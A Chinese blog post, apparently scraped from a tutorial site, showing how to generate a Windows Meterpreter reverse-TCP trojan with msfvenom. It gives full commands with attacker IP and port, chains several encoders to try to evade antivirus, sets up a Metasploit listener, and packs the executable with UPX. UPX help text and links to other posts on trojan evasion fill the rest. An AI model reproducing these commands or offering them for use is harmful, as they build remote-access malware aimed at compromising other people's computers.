msfvenom木马生成+免杀+壳(实测并不能免杀)
msfvenom
选项:
-p, --payload 有效载荷使用。指定一个有效的自定义载荷
--payload-options 列出有效载荷的标准选项
-l, --list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有
-n, --nopsled 在一个nopsled [长度]的大小对有效载荷
-f, --format 输出格式(使用-一个列表的帮助格式)
--help-formats 列出可用的格式
-e, --encoder 使用的编码器
-a, --arch 使用的架构
--platform 有效载荷平台
--help-platforms list available平台
-s, --space 所得到的有效载荷的最大大小
--encoder-space 编码的有效载荷的最大大小(默认值为S的值)
-b, --bad-chars 人物避免实例列表:“x00xff”
-i, --iterations 编码有效负载的次数
-c, --add-code 指定一个额外的Win32文件包括shellcode
-x, --template 指定要使用的自定义可执行文件作为模板
-k, --keep 保存模板行为,并将有效载荷注入一个新线程
-o, --out 保存有效载荷
-v, --var-name 为特定的输出格式指定一个自定义变量名称
--smallest 产生最小可能的有效载荷
-h, --help 显示此消息
实例: (生成)
msfvenom -p(有效攻击载体) windows/meterpreter/reverse_tcp -e(使用编码器,理解成在什么平台运行) x86/shikata_ga_nai -i (编码次数,理解成混淆特征码)5 -b(特征码绕过) “\x00” lhost=192.168.11.227 lport=443(攻击者ip和监听端口) -f(输出的格式) exe > (输出成什么)payload.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “\x00” lhost=192.168.0.7 lport=4444 -f exe > text.exe
Msf> use exploit/multi/handler #用于反向监听的模块
Msf exploit(handler)>set payload windows/meterpreter/reverse_tcp #选择攻击模块
Payload => windows/meterpreter/reverse_tcp
Msf exploit(hanler) > show options
Msf exploit(hanler) > set lhost 192.168.11.222
Msf exploit(hanler) > set lport 443
Msf exploit(hanler) > exploit #启用监听
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “\x00” lhost=192.168.11.227 lport=443 -f raw (生成可编译机器码)|(管道符传递) msfvenom -a x86 --platform win -e x86/alpha_upper -i 2 -f raw | msfvenom -a x86 --platform win -e x86/shikata_ga_nai -i 5 -f raw |msfvenom -a x86 --platform win -e x86/countdown -i 5 -f exe -o text.exe (以上经过多次混淆代码 但文件依旧可以使用 )
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “\x00” lhost=192.168.0.7 lport=4444 -f raw | msfvenom -a x86 --platform win -e x86/alpha_upper -i 2 -f raw | msfvenom -a x86 --platform win -e x86/shikata_ga_nai -i 5 -f raw |msfvenom -a x86 --platform win -e x86/countdown -i 5 -f exe -o text.exe
加壳 压缩 (使其成为透明)
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
命令:
-1 压缩更快 -9 压缩更好
-d 使减压; -l 表压缩文件
-t 测试压缩文件 -V 显示版本号
-h 给更多的帮助 -L 显示软件许可证
选项:
-q 安静模式 -v 是冗长的
-oFILE 写入输出到“文件”
-f 可疑文件的强制压缩
-k 保存备份文件
file.. 可执行文件(DE)压缩
类型“UPX --帮助更详细的帮助。
UPX 配备 ABSOLUTELY NO WARRANTY; 详情访问http://upx.sf.net
upx -5 text.exe
文末附加 upx详细参数解析 (未翻)
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2013
UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013
Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..
命令:
-1 压缩更快 -9 压缩更好
-d 使减压; -l 表压缩文件
-t 测试压缩文件 -V 显示版本号
-h 给更多的帮助 -L 显示软件许可证
选项:
-q 安静模式 -v 是冗长的
-oFILE 写入输出到“文件”
-f 可疑文件的强制压缩
-k 保存备份文件
file.. 可执行文件(DE)压缩
--no-color, --mono, --color, --no-progress 改变外观
压缩优化选项:
--brute 尝试所有可用的压缩方法和过滤器 [slow]
--ultra-brute 尝试更多的压缩变种 [very slow]
备份选项:
-k, --backup 保持文件备份
--no-backup 没有备份文件[默认]
覆盖选项:
--overlay=copy 复制附加到文件的任何额外数据[默认]
--overlay=strip 带附加到文件的任何附加数据[DANGEROUS]
--overlay=skip 不要用覆盖来压缩文件
在 djgpp2/coff的选项:
--coff 产生COFF输出[默认]:EXE
可选择的:
--8086 使压缩的任何8086个工作
选择dos/exe:
--8086 使压缩exe在任何8086
--no-reloc 把没有搬迁到EXE头
选择dos/sys:
--8086 使压缩的系统工作在任何8086
选择生成 ps1/exe:
--8-bit 使用8位大小压缩[默认值:32位]
--8mib-ram 8 MB内存限制[默认:2 MIB ]
--boot-only 禁用客户端/主机传输兼容性
--no-align 不要对齐到2048个字节[使:-控制台运行]
选择生成watcom/le:
--le 产生了输出[默认]:EXE
选择生成 win32/pe, rtm32/pe & arm/pe:
--compress-exports=0 不要压缩导出部分
--compress-exports=1 压缩导出部分[默认]
--compress-icons=0 不要压缩任何图标
--compress-icons=1 压缩所有,但第一个图标
--compress-icons=2 压缩所有,但第一个图标目录[默认]
--compress-icons=3 压缩所有图标
--compress-resources=0 不压缩任何资源
--keep-resource=list 不压缩列表指定的资源
--strip-relocs=0 不带迁移
--strip-relocs=1 带搬迁[默认]
选择生成 linux/elf:
--preserve-build-id 复制gnu.note.build-id压缩输出。
file.. 可执行文件(DE)压缩
此版本支持: (以下不在一一叙述 )
AMD64-darwin.macho Mach/AMD64
ARMEL-darwin.macho Mach/ARMEL
amd64-linux.elf linux/ElfAMD
amd64-linux.kernel.vmlinux vmlinux/AMD64
amd64-win64.pe win64/pe
arm-linux.elf linux/armel
arm-linux.kernel.vmlinux vmlinux/armel
arm-wince.pe arm/pe
armeb-linux.elf linux/armeb
armeb-linux.kernel.vmlinux vmlinux/armeb
armel-linux.kernel.vmlinuz vmlinuz/armel
fat-darwin.macho Mach/fat
i086-dos16.com dos/com
i086-dos16.exe dos/exe
i086-dos16.sys dos/sys
i386-bsd.elf.execve BSD/386
i386-darwin.macho Mach/i386
i386-dos32.djgpp2.coff djgpp2/coff
i386-dos32.tmt.adam tmt/adam
i386-dos32.watcom.le watcom/le
i386-freebsd.elf BSD/elf386
i386-linux.elf linux/elf386
i386-linux.elf.execve linux/386
i386-linux.elf.shell linux/sh386
i386-linux.kernel.bvmlinuz bvmlinuz/386
i386-linux.kernel.vmlinux vmlinux/386
i386-linux.kernel.vmlinuz vmlinuz/386
i386-netbsd.elf netbsd/elf386
i386-openbsd.elf opnbsd/elf386
i386-win32.pe win32/pe
m68k-atari.tos atari/tos
mips-linux.elf linux/mipseb
mipsel-linux.elf linux/mipsel
mipsel.r3000-ps1 ps1/exe
powerpc-darwin.macho Mach/ppc32
powerpc-linux.elf linux/ElfPPC
powerpc-linux.kernel.vmlinux vmlinux/ppc32
msfvenom木马生成+免杀+壳(实测并不能免杀)的更多相关文章
- 【黑客免杀攻防】读书笔记2 - 免杀与特征码、其他免杀技术、PE进阶介绍
第3章 免杀与特征码 这一章主要讲了一些操作过程.介绍了MyCCL脚本木马免杀的操作,对于定位特征码在FreeBuf也曾发表过类似工具. VirTest5.0特征码定位器 http://www.fre ...
- MSFVENOM SHELLCODE生成备忘录
MSFVENOM SHELLCODE生成 通用Shellcode msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHO ...
- Metasploit实现木马生成、捆绑、免杀
原创博客,转载请注出处! 我的公众号,正在建设中,欢迎关注: Meatsploit介绍 2018/01/03 更新 Metasploit是一款优秀的开源(!= 完全免费)渗透测试框架平台,在该平台下可 ...
- 利用kali自带的msfvenom工具生成远程控制软件(木马)
2.生成一个简单的木马 3. 4. 5. 6.接下来生成的winx64muma.exe实际演示 7.将生成的winx64muma.exe在受害者机器上运行 8.在kali下输入msfconsole 9 ...
- Msfvenom木马使用及TheFatRat工具
msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUN ...
- Linux使用expect实现免手动密码输入,linux免密码登陆
使用expect实现自动登录的脚本,网上有很多,可是都没有一个明白的说明,初学者一般都是照抄.收藏.可是为什么要这么写却不知其然.本文用一个最短的例子说明脚本的原理. 脚本代码如下: ###### ...
- 9.利用msfvenom生成木马
这篇文章来介绍一下msf中一个生成木马的msfvenom模块. msfvenom命令行选项如下: 英文原版: 中文版: Options: -p, --payload <payload> 指 ...
- Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结
Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...
- 【黑客免杀攻防】读书笔记15 - 源码免杀、C++壳的编写
1.源码免杀 1.1 定位产生特征的源码 定位文件特征 1.根据MyCCL的特征码定位工具,定位出有特征的地址 2.根据VS的反汇编窗口,输入有特征的地址得到特征地址与源码的关系 3.插入Messag ...
随机推荐
- PHP 中的文本截取分析之效率
PHP 中的文本截取分析之效率 在使用 ThinkPHP 或 Laravel 时都会有用到文本截取的帮助函数. 分别是 msubstr (ThinkPHP 3,ThinkPHP 5 没找到) mb_s ...
- sql server常用日期格式化
/*8 24 108 - hh:mm:ss */ Select CONVERT(varchar(), GETDATE(), )-- :: Select CONVERT(varchar(), GETDA ...
- 管道和FIFO 二
前面我们学习了一下进程,我们知道多,进程间的地址空间相对独立.进程与进程间不能像线程间通过全局变量通信. 如果想进程间通信,就需要其他机制. 常用的进程间通信方式有这几种 A.传 ...
- erlang的一些系统限制修改
atom个数限制 +t xxx 进程数限制 +P xxxx ets表个数限制 +e xxx ports个数限制 +Q xxxx 查看限制 string:tokens(binary_to_list(er ...
- 在vs2010中编译log4cxx-0.10.0详细方法(从下载、编译、解决错误详细介绍)
在vs2010中编译log4cxx-0.10.0详细方法(从下载.编译.解决错误详细介绍) http://blog.sina.com.cn/s/blog_a459dcf501013tbn.html
- php ini_set更改php.ini配置,通过它修改php.in达到php上传文件大小限制是不行的,除非修改.htaccess文件
PHP ini_set() 无效的原因:如题:我租的是虚拟主机,php.ini里的upload_max_filesize是默认的2M,要直接修改php.ini文件是不可能的.我如果想上传超过2M的怎么 ...
- 【POJ】3378 Crazy Thairs(树状数组+dp+高精)
题目 传送门:QWQ 分析 题意:给个数列,求有多少五元上升组 考虑简化一下问题:如果题目求二元上升组怎么做. 仿照一下逆序对,用树状数组维护一下就ok了. 三元怎么做呢? 把二元的拓展一位就可以了, ...
- setAttribute第三个参数
object.setAttribute(sName, vValue [, iFlags]) sName参数应是Dom属性而非html中的属性.Dom中Html专有的接口属性应该以小写字母开头,如果属性 ...
- PHP-fpm启动时 出现 PHP Warning: PHP Startup: Invalid library (maybe not a PHP library) 'fileinfo.so' in Unknown on line 0
出现该问题的原因之一是: 在编译PHP时启用了fileinfo扩展(内置),但同时在php.ini文件中添加了: extension=fileinfo.so 去掉或注释之后,重启php-fpm,警告消 ...
- pycharm中使用redis模块入门
数据缓存系统:1:mongodb:是直接持久化,直接存储于硬盘的缓存系统2:redis: 半持久化,存储于内存和硬盘3:memcache:数据只能存储在内存里的缓存系统 redis是一个key-val ...